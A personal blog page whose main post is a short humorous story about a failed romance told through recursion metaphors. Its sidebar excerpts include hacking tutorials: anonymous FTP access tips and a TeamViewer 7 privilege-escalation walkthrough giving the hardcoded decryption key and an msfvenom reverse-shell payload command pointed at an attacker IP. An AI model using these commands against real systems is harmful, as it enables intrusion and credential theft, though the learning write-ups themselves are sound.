Skip to main content

Recursion




“So, what’s your number?” he asked me with innocent eyes, contemplating a number low enough to render me virtuous but high enough to guarantee some skill. In other words, n - 1. 

I sighed and looked at ceiling. The scene was all too familiar. This time however, I wasn’t with a graduate student. Or an engineer. I was with a DJ. 

“One time, I wrote a C program to remove the voice from a sound file,” I said shyly as he leaned in and grazed my earlobe. 

Suddenly, he pulled back with disappointment. 

“I’m really sorry, but I have to go to my show,” he said as he stuffed his headphones into his backpack. “I’ll see you later.” 

The door slammed in the distance.


I sighed and hung my head in shame. For I was embarking on the same destructive behavior, watching helplessly as my actions iterated miserably in a never-ending loop. Like recursion, a new romance temps with the promise of a memory address, such as the $user = “girlfriend” string assignment embodied by the updated Facebook relationship status. But sadly, I iterate again and again only to discover a stack overflow of failed relationships. 


Will he be the base case?


At work, the SQL code was verbose and full of left joins. What the hell did NVL mean? Did we cover CASE in my database class? But it didn’t matter. His show was tonight. 

I arrive at the club. The normie was strong, and I’m obviously out of place in my jeans and t-shirt. Then, I see him by the bouncer. He smiles, and I approach. 

“But let’s just be friends,” he says. With his turntable in hand, he unhooked the red velvet rope and disappeared into the darkness. 




Maximum recursion depth exceeded.







Comments

Popular posts from this blog

The Basics: Telnet, FTP and SMB

This post explains three very basic things you should know about hacking. Those are Telnet, FTP, and SMB. Telnet is a client-server protocol used to test connectivity between machines and issue commands. This is very easy way to gain access to a remote computer. This is almost never installed on production machines anymore FTP (File Transfer Protocol) and SMB (Server Message Block) are tools used to store and access files. If these are installed, you can use commands associated with each tool to view files on the remote computer. Sometimes, these contain valuable information that you can use to elevate access. Telnet $  telnet <IP> <PORT> That's all there is to it :)  FTP $  ftp <IP> <PORT> - port is usually 21 - Check if ftp supports anonymous login (username: anonymous, no password) -use ls to list files, "get" to copy files to your local machine   If you get the message: 200 PORT command successful. Consider using PASV. 425 F

TeamViewer 7 Privilege Escalation

Hello! Today was a good day. I learned how to exploit a privesc vulnerability in TeamViewer (version 7) which had eluded me for quite some time due to a lack of user-friendly resources available online. But today I am changing all that ;) So basically, TeamViewer 7 stores user passwords encrypted with AES-128-CBC with a key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. This means that someone can decrypt that password using that key and iv and use it elsewhere if the user in question made repeated use of their password (as users often do!) Now, the process is doing this manually is complicated but luckily for us, a Metasploit module exists to automate this for us! First. generate a payload with msfvenom like so: $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip attacker> LPORT=4444 -f exe > revshell.exe Then move the payload to the machine with PowerShell (remember to move to the file to the

How To Run TOR as a Non-Root User

Hello Friends, Today I finally figured out something that had eluded for quite a while, and that is... the mysterious process of running TOR as a non-root user! Like many other novice hackers, I had tried to run TOR by adding a user in Kali Linux through the following CLI commands: $ useradd guest $ passwd guest $ runuser -l guest -c ./start-tor-browser.desktop Which gave me the lovely error message below: $ Tor Browser must be run within the X Window System This last output one gives us a clue: the X Window System is graphical interface, which means that we need to run this software outside the CLI (you can try downloading the xorg, but that proved to be much of a headache). To do this, go here: Log out as root and login as the user you created. The computer will load the GUI and you will now be able to run TOR as a non-root user! Please let me know if this tutorial helped you out! xoxo